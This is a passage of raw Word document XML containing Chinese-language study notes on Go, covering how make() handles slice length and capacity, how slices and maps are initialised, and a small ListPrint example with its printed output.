      </w:r>
      <w:r>
        <w:t>ength</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而非实际赋值长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB2CF3" w14:textId="77777777" w:rsidR="002D69F2" w:rsidRPr="002D69F2" w:rsidRDefault="002D69F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258A4CEC" w14:textId="046CA501" w:rsidR="00D658E7" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组部分代码如下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过赋值后，</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>实际使用长度</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>没有达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>声明时的</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBBFDB" w14:textId="77777777" w:rsidR="00ED1204" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>length := len(in)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7C781" w14:textId="550ADB61" w:rsidR="00535E76" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>r := make([]string, length, length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCDD80C" w14:textId="4F6D333E" w:rsidR="00535E76" w:rsidRDefault="00535E76" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B53AD03" w14:textId="25FDB0C5" w:rsidR="00535E76" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是经过如下代码处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306302D4" w14:textId="77777777" w:rsidR="00ED1204" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="286D73"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ListPrint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">"[ " </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>" ]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418C5CAC" w14:textId="7B705540" w:rsidR="00ED1204" w:rsidRPr="00ED1204" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231DB568" w14:textId="7A0B44B1" w:rsidR="00ED1204" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印出来的效果是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5739C2" w14:textId="3379555E" w:rsidR="00ED1204" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED1204">
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, , , ,  , </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED1204">
        <w:t>est2, TesT2Add2Project1, zhangxiaoming, manager, xuxiaodong, auditor ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCBB7B" w14:textId="4E20A76C" w:rsidR="002D69F2" w:rsidRDefault="002D69F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004F5338">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:r w:rsidR="002600DA" w:rsidRPr="004F5338">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>初始化数组的时候，能用多少的值是看</w:t>
      </w:r>
      <w:r w:rsidR="002600DA" w:rsidRPr="004F5338">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r w:rsidR="002600DA" w:rsidRPr="004F5338">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A5CE1" w14:textId="6B1D0879" w:rsidR="00ED1204" w:rsidRDefault="00ED1204" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DB0A62" w14:textId="5B0B99A1" w:rsidR="001026C4" w:rsidRDefault="001026C4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，使用的时候有两个方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3692E8" w14:textId="77777777" w:rsidR="00D3032F" w:rsidRDefault="001026C4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> := []string{}</w:t>
      </w:r>
      <w:r w:rsidR="00D3032F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6711A97A" w14:textId="004ED463" w:rsidR="001026C4" w:rsidRDefault="00D3032F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化的切片，每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一次，内存重新分配一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5EAEF4" w14:textId="78C9435D" w:rsidR="001026C4" w:rsidRDefault="001026C4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>:= make([]string, 0, length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A3514" w14:textId="6BD80D77" w:rsidR="00D3032F" w:rsidRDefault="00D3032F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化的数组，容量反正会变大，容量超过的时候，内存重新分配一次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78794813" w14:textId="5FCEECA6" w:rsidR="00D3032F" w:rsidRDefault="00D3032F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20597DF0" w14:textId="56C2A1D1" w:rsidR="00D3032F" w:rsidRDefault="00C50D5F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以不可以被超越</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E2449" w14:textId="6F7C33BF" w:rsidR="00D3032F" w:rsidRDefault="00420543" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如上一节，我声明的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可不可以很小，比他实际的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A934ED" w14:textId="77777777" w:rsidR="00420543" w:rsidRDefault="00420543" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>:= make([]string, 0, length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9BB543" w14:textId="1EB5F16E" w:rsidR="00C50D5F" w:rsidRDefault="00420543" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以的，因为</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会自己增长，</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只不过是你初始化的</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果超越了，则计算机会重新分配内存，给予数组一个更大的</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cap</w:t>
      </w:r>
      <w:r w:rsidR="00C57573">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3597A4AB" w14:textId="56885EB1" w:rsidR="00D3032F" w:rsidRDefault="00D3032F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A5A203" w14:textId="77777777" w:rsidR="00D3032F" w:rsidRDefault="00D3032F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505F9795" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="296" w:name="_Toc159779756"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slices,maps,channels</w:t>
      </w:r>
      <w:bookmarkEnd w:id="296"/>
    </w:p>
    <w:p w14:paraId="7E471EC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09745E23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种变量使用的时候一定要初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504C0DDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明之后也要先初始化，如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC3353" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F09A370" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCFC093" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var tmpConfigAllowlist map[string]interface{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701BACC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>初始化：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C04547" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>tmpConfigAllowlist = make(map[string]interface{})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E9FB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>再使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2111C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for k, v := range configs["allowlist"].(map[string]interface{}) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58475303" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43486CE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C860F4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E056705" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404DFC30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>var identifier []type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0A152" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
